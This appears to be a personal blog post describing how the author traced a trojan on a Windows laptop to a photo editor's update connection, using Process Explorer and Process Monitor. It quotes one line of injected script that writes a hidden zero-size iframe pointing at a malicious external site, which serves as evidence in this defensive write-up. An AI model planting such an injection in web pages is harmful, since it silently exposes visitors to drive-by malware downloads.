Two days ago I accidently ran into a backdoor opened by a software update function. Malicious scripts and executables were downloaded to my laptop... I believe the problem is not only inside the software itself, but also related to Internet Explorer or related Windows security mechanism.
I was trying a photo editing software named nEOiMAGING and suddenly it crashed, with some messages indicating a problem caused by "a.exe". It looked suspicious, doesn't it? I had used that software for a few times and it nevered happend before. Where was the problem originated?
So I opened
Process Explorer and found the file at C:\WINDOWS\system32\a.exe (about 14k). Anytime one file with such a "simple" name in a system directory would almost always mean a trojan, virus, or any other malware. I had to put down my normal work to take a careful look on it.
Process Explorer also showed that this file was started by cmd.exe and the starting directory was exactly where I had nEOiMAGING installed in. It seemed indeed it's caused by this software. Then I did some tests. Normally I should not test them on my machine, as there might be a chance something could go wrong and mess up my system. But I did not have a virtual machine or sandbox to play with, and most of my files were backup regularly. So I took a risky approach and ran the software again directly on my laptop. This time, I opened
Process Monitor and logged every relevant events.
If I disable my internet connection, then the crash does not happen. But I was able to replicate the same crash when I was connected. Process Monitor showed me how a.exe sneaked into my system. It was copied from a file name "dod.exe" in the "Temporary Internet Files" folder. Then I also found some malicious scripts and executables in that directory and its subdir.
By then it became clear that the malware was downloaded via the connection opened by nEOiMAGING. I tried to look for an option to turn off the automatic update service in that software, but could not find one. I guessed it was hard-coded in. Had it been an open-source software, I could have fixed it by myself, or somebody else could have had it fixed long before. That's another reason I prefer to use free software (http://www.gnu.org/philosophy/free-sw.html) or open-source software, if I have a choice.
The final thing I tried to look at was why this did not happen before -- I had used the same software the day before but it was not causing any trouble at that time. The script found in my Temporary Internet Files folder indicated they were from some website and there were code like this
(WARNING: do NOT connect to the site below!)
document.write("<iframe src=http://xxx.hao1680.com/xx.htm?id=017 width=0 height=0></iframe>")
I guessed the update page requested by nEOiMAGING was somehow cracked, and malicious code was added via iframe.
I did not have the time to figure out the details, but it appeared to me this should be a backdoor or exploit of Windows that such a script could download malware to my computer.
This is a little bit disturbing -- it seems even if you do not use IE, the exploits are still able to bite you via other softwares that happen to use the internet connection somehow. One has no choice in this issue, unlike web-browsing, when one could choose the somewhat more "secure" Firefox. The possible solutions are (1) stop using that software, or (2) use a firewall to block the access.